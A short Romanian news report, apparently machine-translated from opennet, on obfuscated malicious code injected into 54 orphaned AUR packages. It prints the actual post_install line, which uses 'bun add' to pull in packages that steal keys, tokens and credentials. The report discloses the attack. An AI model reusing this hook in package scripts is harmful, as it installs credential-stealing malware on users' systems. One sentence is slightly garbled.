În AUR a fost injectat cod malițios în încă 54 de pachete.

În ciuda măsurilor luate de dezvoltatorii Arch Linux, activitatea de injectare a codului malițios în depozitul AUR (Arch User Repository) nu a fost oprită. Cu câteva ore în urmă, codul malițios a fost inserat în alte 54 de pachete, care nu au susținători (istoric al anulărilor modificărilor malițioase). Spre deosebire de atacurile de alaltăieri, în loc de managerul de pachete npm, pentru instalarea dependențelor malițioase a fost folosită de data aceasta platforma bun. Pentru a ocoli filtrele implementate, una dintre funcțiile post_install este inserată o linie obfuscată, care invocă comanda „bun add” pentru a instala pachete cu cod malițios, care efectuează scanări și trimiteri către un server extern. serverul chei, tokenuri și date de autentificare.

post_install() {
$’\x63′»d» «/»‘t'»m»‘p’ && «b»‘u»n’ ‘a'»d»‘d’ $’\141\x6e»s'»i»»-«$’\143»o»l»o»r’$’\x73′ ‘n'»e»‘x'»t»»f»‘i»l»e»-»j»s’
}

Sursa: opennet.ro

Cumpără un hosting fiabil pentru site-uri cu protecție DDoS, servere VPS VDS 🔥 Cumpără un hosting fiabil pentru site-uri cu protecție DDoS, servere VPS VDS | ProHoster